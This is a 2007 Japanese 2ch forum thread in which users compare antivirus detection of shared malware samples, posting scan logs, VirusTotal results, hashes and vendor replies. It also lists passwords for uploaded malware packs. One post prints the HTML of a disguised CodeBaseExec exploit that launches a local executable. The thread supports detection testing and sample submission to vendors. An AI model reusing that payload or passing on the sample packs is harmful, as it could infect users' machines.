NOD32 1つ
時間 モジュール 対象 名前
2007/09/09 1:07:14 AMON ファイル Y:\tane_uljp00117\TMASInstall_EN_US.exe Win32/TrojanDropper.Agent.BTC トロイ
764:名無しさん@お腹いっぱい。
07/09/09 03:23:21
>>746
カスペ7
9/14(うち2は白、待ちは3)
1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey ?
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe 送るの忘れてたwww。俺ワロス。
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.exe
もう一回送るか?(4,5,b)
7.exeは返事が来ないけれど、いつの間にか検知という悲しいパターン。
サンキューメールがもらえないってのは、(TOT)
時間がかかるね、日ロ関係を悪化させない程度にフォローしてみるか?
でかいけれど、萌え動画が入っているのか?
ロシア人、日本の検体に失笑。
765:名無しさん@お腹いっぱい。
07/09/09 04:17:02
おまいらny系だと食いつきいいなあw
766:名無しさん@お腹いっぱい。
07/09/09 10:07:24
P2Pなんジョングってもないしテーハミンとも思わグックない
767:名無しさん@お腹いっぱい。
07/09/09 11:18:03
AVG IS
2.exe Logger.kakkeys.c
6.exe Virus identified Worm/Generic.DHG
7.exe Trojan.Regspy
8.exe Trojan horse Generic3.FGC
9.exe Trojan horse Generic5.QET
c.exe Virus identified Worm/VB.BRG
d.exe Virus identified Worm/VB.CEM
e.exe Trojan horse Generic7.ATT
768:名無しさん@お腹いっぱい。
07/09/09 12:40:23
>>762
「~ の亜種」
もNewHeur_PEとおなじでヒューリスティックで検知だったかと。
まえ試したときはヒューリスティックのみで手動検査ができたから、いまも試せると思うけど。
769:名無しさん@お腹いっぱい。
07/09/09 13:57:35
当たり前だが、P2Pで流通しているウイルスの検知率だと、
公式結果の検出率の半分か3分の1くらいに落ちるね。
やっぱりP2Pの世界は特殊だね。
世間で優秀なAVなら、nyでエロゲダウンしても検知しなければ大丈夫とか
複数のAVで検知しなかったから完璧と思ってるバカが世の中に多いから。
nyで実行ファイルダウンするのは自殺行為なのにね。
770:758
07/09/09 14:07:04
>>746
? 1.文件名:4.exe
? 不是病毒
? 1.文件名:a.exe
? 不是病毒
771:名無しさん@お腹いっぱい。
07/09/09 14:22:57
AntiVirが6.39.1.106で6.exeに対応。TR/Spy.Ruby.Kakkeys.Tとして検出。
土日だから他のは月曜かなあ。
772:770
07/09/09 14:38:05
>>746
1.文件名:b.exe
不是病毒
1.文件名:5.exe
不是病毒
773:名無しさん@お腹いっぱい。
07/09/09 16:34:26
みんなどうやってそんなにウイルスを手に入れてるの?
P2Pでエロゲーを落としてくればちょこちょこ入ってるものなの?
774:名無しさん@お腹いっぱい。
07/09/09 17:55:47
乞食かw
775:名無しさん@お腹いっぱい。
07/09/09 18:04:34
honeypot
776:名無しさん@お腹いっぱい。
07/09/09 21:42:01
なんてな
777:名無しさん@お腹いっぱい。
07/09/10 15:55:08
>>746
カスペ
b.exe
Hello.
Trojan.Win32.Shutdowner.bm
Detection for this malware has been added to the next antiviral bases update.
--
Regards, Alexey Malyshev
Virus analyst, Kaspersky Lab.
778:名無しさん@お腹いっぱい。
07/09/10 16:07:04
>>746
消えてる><
もっかいあげてもらえませんか?
779:名無しさん@お腹いっぱい。
07/09/10 16:33:42
>>778
URLリンク(www.dotup.org)
virus
何処のソフト使ってるのか教えてほしい。
後、結果と
780:772
07/09/10 16:48:55
>>746
1.文件名:6.exe
病毒名:Trojan.Win32.Agent.yer
1.文件名:1.exe
病毒名:Trojan.Clicker.Win32.Agent.agq
2.文件名:c.exe
病毒名:Trojan.Win32.KillFiles.mw
3.文件名:d.exe
病毒名:Harm.Win32.KillFiles.d
4.文件名:e.exe
病毒名:Harm.Win32.KillFiles.c
送ったのは以上
>>772と言われたが検出
5.exe
Trojan.Win32.Agent.yet
b.exe
Trojan.Win32.ShutDown.ew
781:名無しさん@お腹いっぱい。
07/09/10 16:55:21
>>746
ちょ!Aviraから解析結果来たけれど
1.exeとb.exeはクリーンだと・・・
782:名無しさん@お腹いっぱい。
07/09/10 18:20:52
URLリンク(www5.uploader.jp)
pass: Malware-Pack
いろいろ詰め合わせ
McAfeeには提出済み
783:名無しさん@お腹いっぱい。
07/09/10 18:38:03
>>782
AVG
C:\WINDOWS\デスクトップ\malware\4\ing.htm
Virus found JS/Downloader.Agent
C:\WINDOWS\デスクトップ\malware\9\k.exe
Trojan horse PSW.Lineage.ZB
C:\WINDOWS\デスクトップ\malware\a\tmp.htm
Virus found Exploit
C:\WINDOWS\デスクトップ\malware\b\chat.com
Trojan horse Generic7.JHY
C:\WINDOWS\デスクトップ\malware\e\VideoAccessCodecInstall.exe
Trojan horse Downloader.Zlob
残りは送りました
784:名無しさん@お腹いっぱい。
07/09/10 18:52:59
ウイルスキラー
3\haha.js
Trojan.DL.JS.Agent.lmr
7\ad.htm
Trojan.DL.JS.Agent.lkx
9\k.exe>>packlz>>upx_c
Trojan.PSW.Win32.QMOnline.b
Risingに送りました
785:名無しさん@お腹いっぱい。
07/09/10 18:55:38
>>782
お疲れ様です。
avast!に未検出ファイルを提出しておきました
786:名無しさん@お腹いっぱい。
07/09/10 19:05:18
>>785
いや、そこはどれをなんて名前で検出したか書くとこだろ
787:名無しさん@お腹いっぱい。
07/09/10 19:16:47
NODは2個しか検出しなかった上にえらいスキャンに時間がかかった
検出したのは9とbだけ
788:名無しさん@お腹いっぱい。
07/09/10 20:03:46
>>782
カスペ7
5/14
(1、4,7,9、b)
スルー多い。
検体提出します。
detected: Trojan program Trojan-Downloader.JS.Agent.no File: 1/n404-1.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: 4/ing.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.ko File: 7/ad.htm
detected: Trojan program Trojan-PSW.Win32.OnLineGames.cdo File: 9/k.exe//BeRo//PE_Patch.UPX//UPX//PE_Patch.MaskPE
detected: Trojan program Trojan-PSW.Win32.Magania.zz File: b/chat.com//data.rar/2.sfx.exe//data.rar/2.exe
789:名無しさん@お腹いっぱい。
07/09/10 20:22:38
>>782
Norton Internet Security2007
codec.exeをDownloaderとして検知
残りは贈っときます
790:名無しさん@お腹いっぱい。
07/09/10 20:46:27
>>782
ウイルスバスター2007
codec.exe
TROJ_ZLOB.CYI
haha.js
JS_DLOADER.PSJ
k.exe
TROJ_SYSTEMHI.CT
VideoAccessCodecInstall.exe
TROJ_ZLOB.DSW
検出しなかったものを提出しました。
791:名無しさん@お腹いっぱい。
07/09/10 21:12:40
>>782
カスペ6 2007/09/10 20:03:01
a tmp.htm
c file.exe
d file.exe
e VideoAccessCodecInstall.exe
以外検出
792:791
07/09/10 21:28:47
訂正
カスペ6 - 2007/09/10 20:03:11
後、VideoAccessCodecInstall.exe は、一週間程観察してたけど、Genericパターンで対応できないソフトは検出できない。
バイナリが2時間毎に変わるので、検体を提出しても無意味。
今のところ、AVG、BitDefender、Microsoft、Sophos、Trend Micro しか検出できない。
793:791
07/09/10 21:34:48
嗚呼、ゴミン。
カスペ6 >>788 と同じ(解凍中に中断してた……)。
794:名無しさん@お腹いっぱい。
07/09/10 21:42:32
>>>746
カスペから遅い返事
5.exe
Hello !
This is a new variant of Trojan-Spy.Ruby.Kakkeys Detection will be added in next update.
Thank you !
カスペ7
11/14(うち2は白、待ちは1)
1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe Trojan-Spy.Ruby.Kakkeys
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe Trojan.Win32.Shutdowner.bm
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.ex
795:名無しさん@お腹いっぱい。
07/09/10 22:22:04
ついでにこれもドゾー
URLリンク(www5.uploader.jp)
pass NFL
URLリンク(www.f-secure.com)
↑
これ NFLとかうちら関係ないけどアメリカ産ベンダ未対応が多いんで送ってやってや~
796:名無しさん@お腹いっぱい。
07/09/10 22:45:04
>795
URLリンク(www7.uploader.jp)
URLリンク(www7.uploader.jp)
orz
797:名無しさん@お腹いっぱい。
07/09/10 22:45:27
>>795
AVG
Virus found Downloader.Tibs検出
798:名無しさん@お腹いっぱい。
07/09/10 23:22:01
J-COM相模原4/7火病デビューログ 晒しage
欠陥商品ウイルスバスター擁護でフルボッコ
「500」「バスター厨」「相模原」粘着荒らし総合スレ
スレリンク(sec板:616-625番)
799:名無しさん@お腹いっぱい。
07/09/10 23:48:04
>>795
ノートン反応
Trojan.Packed.13
800:名無しさん@お腹いっぱい。
07/09/10 23:55:11
これな
URLリンク(itpro.nikkeibp.co.jp)
Packed.13にはモルヒネつかわれてるようだ
801:名無しさん@お腹いっぱい。
07/09/11 00:34:51
URLリンク(antispydownloads.org)
日本人狙う偽セキュリティソフト「MalwareBurn」、ウェブルートが警告
URLリンク(internet.watch.impress.co.jp)
URLリンク(www.virustotal.com)
Aviraに検体提出しました
802:名無しさん@お腹いっぱい。
07/09/11 00:58:40
>>801
Symantecに通報済み
803:788
07/09/11 01:07:12
>>782
カスペ 12/14 (14のうち、白1、回答待ち1)
追加検知検体
haha1.js_ - Trojan-Downloader.JS.Agent.ol
haha2.js_ - Trojan-Downloader.JS.Agent.ol,
vip.js_ - Trojan-Downloader.JS.Agent.ok
file.exe- Trojan.Win32.Agent.bar
file2.exe_ - Trojan-Downloader.Win32.Small.fqi
mp3 - Trojan-Downloader.JS.Agent.om
tmp.htm - Exploit.HTML.IESlice.x
問題なし?
codec.exe - No malicious software was found in the attached file.
回答待ち
VideoAccessCodecInstall.exe- 回答待ち
804:名無しさん@お腹いっぱい。
07/09/11 01:13:38
Aviraうpデートできねー
検体送る気にもならんわ
805:名無しさん@お腹いっぱい。
07/09/11 01:36:42
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.112
--> malware/1/n404-1.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Crypted.Gen
--> malware/2/codec.exe
[DETECTION] Contains detection pattern of the dropper DR/Agent.114628
--> malware/4/ing.htm
[DETECTION] Is the Trojan horse TR/Dldr.Agent.NV.6
--> malware/7/ad.htm
[DETECTION] Is the Trojan horse TR/Dldr.Psyme.KO.1
--> malware/9/k.exe
[DETECTION] Is the Trojan horse TR/Drop.Lineage.ACN
--> malware/a/tmp.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Dldr.Agen.AJ.8
--> malware/b/chat.com
[1] Archive type: RAR SFX (self extracting)
--> 2.sfx.exe
[2] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> malware/c/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/d/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/e/VideoAccessCodecInstall.exe
[DETECTION] Contains detection pattern of the dropper DR/Dldr.Zlob.AANT.1
未検出 0.3.5.6.8
806:名無しさん@お腹いっぱい。
07/09/11 01:44:39
>>795
追加
--> tracker.exe
[DETECTION] Contains detection pattern of the worm WORM/Storm.tcn
807:名無しさん@お腹いっぱい。
07/09/11 02:10:05
>>795
>>801
ウイルスバスター(CPR)でスルー
検体送付済み
808:名無しさん@お腹いっぱい。
07/09/11 09:33:06
>>795
McAfee: ヽ(`Д´)ノ
WebImmuneに提出したら近いうちにTibs-Packedとして対応するらしい
>>801
スルーヽ(`Д´)ノ
でかすぎて送れねえヽ(`Д´)ノ
809:名無しさん@お腹いっぱい。
07/09/11 12:08:48
>>808
>>801は7-zipで開くとMalwareBurn 7.1.exeで
1.53MBだと送れないかな?
MD5:
65E9A700AAD9E0CCD6EC82750E606346
SHA1:
AD764A0D3E835A34A384DDD90D8F4508304C36E9
810:名無しさん@お腹いっぱい。
07/09/11 12:10:00
7-zipで開いてファイル毎に送るとかね。
811:名無しさん@お腹いっぱい。
07/09/11 14:42:21
>>801
Avast(VPS774-1)は検出
Win32:Spycrush [Tool]
812:名無しさん@お腹いっぱい。
07/09/11 15:17:16
>>801
URLリンク(www.virustotal.com)
File mb_install.exe received on 09.11.2007 07:59:56 (CET)
Result: 3/31 (9.68%)
Avast 4.7.1043.0 2007.09.10 Win32:Spycrush
Kaspersky 4.0.2.24 2007.09.11 not-a-virus:FraudTool.Win32.MalwareBurn.a
Symantec 10 2007.09.11 MalwareBurn
File size: 3300227 bytes
MD5: b5c6857e91ab15aff90145d8701b4fd3
SHA1: e8c61d7870039ef42496d7addd7e3707faf366bf
packers: BINARYRES
813:名無しさん@お腹いっぱい。
07/09/11 15:19:11
>>801
avast!対応済み。
URLリンク(www.crazyclits.com)
814:名無しさん@お腹いっぱい。
07/09/11 16:28:10
>>795
Rising
1.文件名:tracker.exe
病毒名:Rootkit.Win32.Agent.ngz
815:名無しさん@お腹いっぱい。
07/09/11 22:15:32
>>813
氏ねよヴォケ!
816:788=803
07/09/12 03:36:29
>>746
今返事北産業
カスペ7
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Wednesday, September 12, 2007 3:05 AM
Subject: RE: A New Malware? Please Inspect This File. [KLAB-2885407]
Hello,
VideoAccessCodecInstall.exe_ - Trojan-Downloader.Win32.Zlob.cmh
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
ちと時間がかかった。ザコルツヘブスキー君。Zlob
最初5/14→提出後12/14(2個は白~1.exe, a.exe)
5/12=41.7% orz
817:名無しさん@お腹いっぱい。
07/09/12 03:44:00
カスペ7
>>795
detected: riskware not-a-virus:FraudTool.Win32.MalwareBurn.a File: mb_install.exe//data0007
>>801
detected: virus Packed.Win32.Tibs.bt File:tane_uljp00127.zip/tracker.exe
818:名無しさん@お腹いっぱい。
07/09/12 06:03:23
>>801
Avira検出
DR/FraudTool.MalwareBurn.A
819:名無しさん@お腹いっぱい。
07/09/12 14:15:58
>>817
カスペGJ
820:名無しさん@お腹いっぱい。
07/09/12 21:36:36
アンカーBJ
821:名無しさん@お腹いっぱい。
07/09/13 18:24:30
URLリンク(www.dotup.org)
virus
山田とか騒がれてるが
822:名無しさん@お腹いっぱい。
07/09/13 18:48:10
ただのjpgとgif詰め合わせの自己解凍書庫
823:名無しさん@お腹いっぱい。
07/09/13 19:04:55
>>821
自分で解凍もできんのか?
見りゃウイルスじゃないことぐらい分かるだろが
824:名無しさん@お腹いっぱい。
07/09/15 18:25:04
検体:>>746
カスペ7
4.exeについて一週間ぶりに返事キタ━━━(゜∀゜)━━━ !!。
でも、遅い。糞詰まりでも起こしているのか?ヽ(`Д´)ノウワァァン!!
-----------------------------------------------------------
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 15, 2007 1:26 PM
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871286]
Hello,
4.exe - Trojan-Spy.Ruby.Kakkeys.u
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
---------------------------------------------------------
結論
5/14→12/14(うち2は白,。1.exeとa.exe)
2.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
3.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
4.exe Trojan-Spy.Ruby.Kakkeys.u
5.exe Trojan-Spy.Ruby.Kakkeys
6.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.t
7.exe : Trojan program Trojan.Win32.VB.aqk
8.exe : Trojan program Trojan.Win32.Delf.zu
9.exe : Trojan program Trojan.Win32.Delf.zu
b.exe Trojan.Win32.Shutdowner.bm
c.exe: Trojan program Trojan.Win32.Haradong.ar
d.exe: Trojan program Trojan.Win32.KillFiles.ki
e.exe: Trojan program Trojan.Win32.KillFiles.ki
825:名無しさん@お腹いっぱい。
07/09/15 23:03:01
カスペ厨必死だなw
826:名無しさん@お腹いっぱい。
07/09/15 23:04:26
出張すんな
827:名無しさん@お腹いっぱい。
07/09/15 23:23:33
カスペは評判だけが先行して、
実は売れてないとか?
828:名無しさん@お腹いっぱい。
07/09/16 00:24:21
>>827
Amazonランキング見てみな
829:名無しさん@お腹いっぱい。
07/09/16 01:14:14
>>827
なんか中国でシェアNo1になるかもしれん勢いなんだとさ
知ったこっちゃねーがw
元々ゴミみたいなアンチウイルスがシェア上位を牛耳ってただけだしなw
830:名無しさん@お腹いっぱい。
07/09/16 09:27:55
またNOD厨か
831:名無しさん@お腹いっぱい。
07/09/16 09:53:51
>>829
中国のソフトウェア市場は9割が海賊版
832:名無しさん@お腹いっぱい。
07/09/16 12:26:31
URLリンク(www5.uploader.jp)
pass : folder
中身は .folderファイル
833:名無しさん@お腹いっぱい。
07/09/16 12:59:55
>>832
カス7
Exploit.HTML.CodeBaseExec
834:名無しさん@お腹いっぱい。
07/09/16 17:57:49
カス厨自演乙
835:名無しさん@お腹いっぱい。
07/09/16 18:38:12
>>832
McAfeeスルーヽ(`Д´)ノ
836:名無しさん@お腹いっぱい。
07/09/16 18:46:37
>>835
___
/ ヽ
, -‐ (_).⌒ l ̄| ⌒ | プギャーーー
l_j_j_j と) ノ─| ノ
/ / ヽ
〈 ノ |
837:名無しさん@お腹いっぱい。
07/09/16 18:52:58
>>832
これの中身って
<html><head><title></title>
<object CLASSID='CLSID:4455A55A-5FF7-42A0-94C4-CEAD0F76F6F5' CODEBASE='img001.txt.exe'></object>
<script>window.location = "./";</script></head><body></body></html>
ってゆうhtmlみたいなんだけど、これってどんな実害あるの?
838:名無しさん@お腹いっぱい。
07/09/16 19:01:04
>>832
F-Secure2008
Exploit.HTML.CodeBaseExec
839:837
07/09/16 19:02:38
>>832
アンカーミスった。。。
つまりローカルだと「img001.txt.exe」ってゆうウィルス実体?ファイルが存在しないのに、
このhtmlをトロイダウンローダーとかって判定するのってなんかむちゃくちゃな気が。。。
潜在的に危険なhtmlってこと?おれなんか大きな勘違いしてる?
840:名無しさん@お腹いっぱい。
07/09/16 19:24:33
>>832
URLリンク(www.virustotal.com)
File virus.folder received on 09.16.2007 12:16:29 (CET)
Result: 5/32 (15.63%)
ClamAV 0.91.2 2007.09.16 Trojan.Downloader.HTML.Codebase-1
Fortinet 3.11.0.0 2007.09.16 HTML/CodeBaseExec.A!exploit
F-Secure 6.70.13030.0 2007.09.15 Exploit.HTML.CodeBaseExec
Ikarus T3.1.1.12 2007.09.16 Exploit.HTML.CodeBaseExec
Kaspersky 4.0.2.24 2007.09.16 Exploit.HTML.CodeBaseExec
File size: 192 bytes
MD5: 3f66c020cda211770342071272571f1b
SHA1: de341e53a7ba3cf1e4e961aa77b63e63be12f470
841:名無しさん@お腹いっぱい。
07/09/16 20:40:16
>>832
ノートン
\virus.folder This file is not malicious by itself. However, it may be used by a malicious program.
842:名無しさん@お腹いっぱい。
07/09/16 20:46:53
これじゃねえの?
URLリンク(www.trendmicro.co.jp)
843:名無しさん@お腹いっぱい。
07/09/16 21:06:24
783 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/09/16(日) 21:01:42
Norton2002とAntivirが同等の検出力とか言ってる人。
下のスレを一ヶ月以上チェックして詳細な報告レポートを作ってくれ。
Antivirスレで場違いなノートンの宣伝をするのなら、これくらいのことはしてもらいたい。
【気違い】検出可否報告スレ3【禁止】
スレリンク(sec板)
844:名無しさん@お腹いっぱい。
07/09/16 21:10:23
一部のマルウェアの検出可否だけで判断するのは危険
AV ComparativesやVirus Bulletinのレポートを読む方が正確
845:名無しさん@お腹いっぱい。
07/09/16 21:19:20
つーことは二流三流のマルウェアにはノートン役立たずってことか
ストライクゾーン狭いんだな
846:名無しさん@お腹いっぱい。
07/09/16 21:23:06
>>845
ワールドワイドで確認されてるマルウェアが対象なんだから
ストライクゾーンは広すぎるくらい
馬鹿かお前はw
847:名無しさん@お腹いっぱい。
07/09/16 21:31:23
ということは
ワールドワイドの土俵の外はからっきし確定じゃん
井の中の蛙ストライクゾーンなんだね
848:名無しさん@お腹いっぱい。
07/09/16 21:51:30
確かにそうだな
少なくとも俺のワールドワイドは一般のワールドワイド+このスレだしな
849:名無しさん@お腹いっぱい。
07/09/16 22:18:23
某ワールドワイド君のワールドワイドは向こう三軒両隣程度という見解でよさそうだw
850:名無しさん@お腹いっぱい。
07/09/16 22:28:42
井の中の蛙ってw
Winnyにしか興味のない奴こそ
井の中の蛙、大海を知らずというべきだろw
851:↑ブツのネタ元知ってるみたいだYO www
07/09/16 22:37:09
そうなんだ知らなかったよ いやぁ 失敬失敬
852:名無しさん@お腹いっぱい。
07/09/16 22:43:39
問うに落ちず語るに落ちるw
853:名無しさん@お腹いっぱい。
07/09/16 22:45:32
AV ComparativesやVirus Bulletin引き合いに出したあげくが
ただの乞食かよw
854:名無しさん@お腹いっぱい。
07/09/16 22:46:30
なんかいつの間にかすごい勢いでwinny君は李下で冠を正してますな
855:名無しさん@お腹いっぱい。
07/09/16 23:47:10
>>852-854
なんか乞食が顔真っ赤にしてるな
856:↑
07/09/16 23:56:06
AV ComparativesやVirus Bulletinが大好きな乞食
857:↑もしかして長考1時間
07/09/16 23:57:19
.
858:名無しさん@お腹いっぱい。
07/09/16 23:59:03
>>856
おい 先に矢印使うなよ(^^;
859:↑
07/09/16 23:59:05
AV ComparativesやVirus Bulletinが大好きな乞食
860:859
07/09/17 00:03:56
>>858
レスタイミング悪すぎたな グダグダやw
861:名無しさん@お腹いっぱい。
07/09/17 00:04:14
(^^;オレ流れ弾に撃たれてる気がするw
862:名無しさん@お腹いっぱい。
07/09/17 00:18:22
AV ComparativesやVirus Bulletinが大好きな乞食のせいだな。
863:名無しさん@お腹いっぱい。
07/09/17 00:42:24
>>832
VB2007
スルー。検体送信済み
864:名無しさん@お腹いっぱい。
07/09/17 01:02:10
>>832
Antivirスルー(;´Д`)
865:名無しさん@お腹いっぱい。
07/09/17 06:10:43
>832
乙です!!
NOD32未検出。
提出しておきました。
866:名無しさん@お腹いっぱい。
07/09/17 21:16:50
>>832
AntiVir検出
Exp/HTML.CodeBaseExec.61
867:名無しさん@お腹いっぱい。
07/09/18 19:10:39
URLリンク(www5.uploader.jp)
Pass: Malware-Pack
いろいろ詰め合わせ
McAfeeには提出済み
868:名無しさん@お腹いっぱい。
07/09/18 19:23:52
>>867
乙です
Norton Internet Security 2008
2体検出/12ファイル
1.vbs : W32.SillyFDC
ad.htm : Downloader
残りは贈っておきます
869:名無しさん@お腹いっぱい。
07/09/18 19:41:04
>>867
ウイルスキラー
4\qq.htm
Trojan.DL.Script.JS.Agent.aa
5\ad.htm
Trojan.DL.Script.JS.Agent.lhf
9\cthaninkey.CAB>>MSINET.OCX
Trojan.PSW.Win32.LMir.yff
b\prviacy
Trojan.DL.Script.JS.Agent.af
870:名無しさん@お腹いっぱい。
07/09/18 19:53:39
チンカスペ
0\index.htm : JS.Agent.nv
4\qq.htm : HTML.Small.h
5\ad.htm : JS.Psyme.kf
残りは送る気毛頭ありません
871:名無しさん@お腹いっぱい。
07/09/18 22:35:27
>>867
ウイルスバスター2007
qq.htm JS_DLOADER.TTZ
他スルーなので検体提出
872:名無しさん@お腹いっぱい。
07/09/18 23:23:28
>>867
AVG
0\INDEX.HTM
Virus found JS/Downloader.Agent
6\INDEX.HTM
Virus found JS/Downloader.Agent
7\WMV.HTM
Virus found JS/Downloader.Agent
8\JB.EXE
Trojan horse Generic3.TJI
C\1.VBS
Virus found VBS/Nadix
残りはスルーしたので検体送りました
873:名無しさん@お腹いっぱい。
07/09/19 01:31:31
>>867
カスペ7
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
これから検体提出
874:名無しさん@お腹いっぱい。
07/09/19 02:07:28
>>867
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.147
--> Malware/4/qq.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Nomo.1
--> Malware/5/ad.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
--> Malware/6/index.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen
--> Malware/b/prviacy
[DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Agent.AA
う~ん
875:名無しさん@お腹いっぱい。
07/09/19 08:38:51
>>867
AVG IS
0 Virus found JS/Downloader.Agent
6 Virus found JS/Downloader.Agent
7 Virus found JS/Downloader.Agent
8 Trojan horse Generic3.TJI
b Not-A-Virus.Exploit.HTML.Mht
c Virus found VBS/Nadix
876:869
07/09/19 11:43:45
9\cthaninkey.CAB>>MSINET.OCX
誤検出でした
877:873
07/09/19 12:11:00
>>867
カスペ7
0と7は追加検出。カスペ判断ではゴミ多い。
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.no File: tane_uljp00133.zip/Malware/6/index.htm
detected: Trojan program Trojan-Downloader.JS.Agent.qj File: tane_uljp00133.zip/Malware/7/wmv.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
以下のファイルは、
No malicious software was found in the attached file.
1 ceshi,exe
2 errclean.exe
3 Setup.,exe
8.Jb.exe
9. cthaninkey.cab
a adnuke35.exe
878:名無しさん@お腹いっぱい。
07/09/19 13:15:11
カスペ
879:名無しさん@お腹いっぱい。
07/09/19 19:45:08
Stoned.Angelina
URLリンク(sunbeltblog.blogspot.com)
880:名無しさん@お腹いっぱい。
07/09/19 19:57:18
現代のウイルス対策ソフト、過去のウイルスに対処できず
URLリンク(www.itmedia.co.jp)
正常に検出および削除ができたソフト
G Data (AVK) Total Care 2008
BitDefender Internet Security 2008 (v10)
Kaspersky Internet Security 7.0
検出できたが削除はできなかったソフト
BullGuard Internet Security 7.0
McAfee Internet Security 2007
Trend Micro PC-cillin Internet Security 2007
(ウイルスバスター 2007)
Avira AntiVir Personal Premium (v7)
検出および削除はできたが、その後 OS が起動できなくなってしまったソフト
Symantec Norton 360
Panda Internet Security 2008 (v12)
検出できなかったソフト
Microsoft OneCare 1.6
881:名無しさん@お腹いっぱい。
07/09/20 00:57:32
Microsoft OneCareの存在意義を問いただしたい
882:名無しさん@お腹いっぱい。
07/09/20 01:58:41
URLリンク(www5.uploader.jp)
pass: msn
Messenger経由系(Live?)
ロンドン在住の友人よりこんにちわ
883:名無しさん@お腹いっぱい。
07/09/20 02:19:43
>>882
URLリンク(www.virustotal.com)
File IMG09-18.jpeg-www.photoupload.com received on 09.19.2007 19:00:49 (CET)
Result: 11/32 (34.38%)
AntiVir 7.6.0.15 2007.09.19 Worm/LamerDetect.A
AVG 7.5.0.485 2007.09.19 Obfustat.PIZ
BitDefender 7.2 2007.09.19 Trojan.Agent.AFGC
CAT-QuickHeal 9.00 2007.09.19 I-Worm.LamerDetect.a
F-Secure 6.70.13030.0 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Ikarus T3.1.1.12 2007.09.19 Trojan-PWS.Win32.LdPinch.FI
Kaspersky 4.0.2.24 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Prevx1 V2 2007.09.19 Worm.Ircbot.Gen
Sunbelt 2.2.907.0 2007.09.19 VIPRE.Suspicious
TheHacker 6.2.5.062 2007.09.19 W32/LamerDetect.a
Webwasher-Gateway 6.0.1 2007.09.19 Worm.LamerDetect.A
File size: 29429 bytes
MD5: 8aefba0f7dc85ef4ac95378388fae724
SHA1: 8b0475b1284a3d0bf385c8e6126083fafc0d4017
packers: PECRYPT
Prevx info: URLリンク(fileinfo.prevx.com)
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
884:名無しさん@お腹いっぱい。
07/09/20 03:18:55
>>882
ウイルスバスター 2007(CPR)スルー
検体提出しました
885:名無しさん@お腹いっぱい。
07/09/20 07:53:13
NOD32だめだな。
